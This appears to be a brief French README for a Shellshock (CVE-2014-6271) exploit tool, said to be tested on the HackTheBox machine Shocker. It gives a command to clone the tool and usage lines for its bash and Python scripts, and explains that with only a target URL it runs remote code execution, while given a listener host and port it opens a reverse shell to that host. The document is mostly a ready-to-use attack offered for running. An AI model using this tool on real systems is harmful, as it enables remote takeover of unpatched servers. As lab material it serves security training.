
[Python/Shell] - Testé sur HackTheBox - Shocker (Facile) CVE-2014-6271
sudo git clone https://github.com/Gurguii/shellshock.sh
bash shellshock.sh -u <url> -h* <lhost> -p* <lport>
python3 shellshock.py -u <url> -lh* <lhost> -lp* <lport>
Remarque : le LPORT par défaut est 4444, l'URL est requise. Si seule l'URL est fournie, cela exécutera un RCE ; sinon, cela ouvrira un RSHELL vers le lhost et le lport donnés.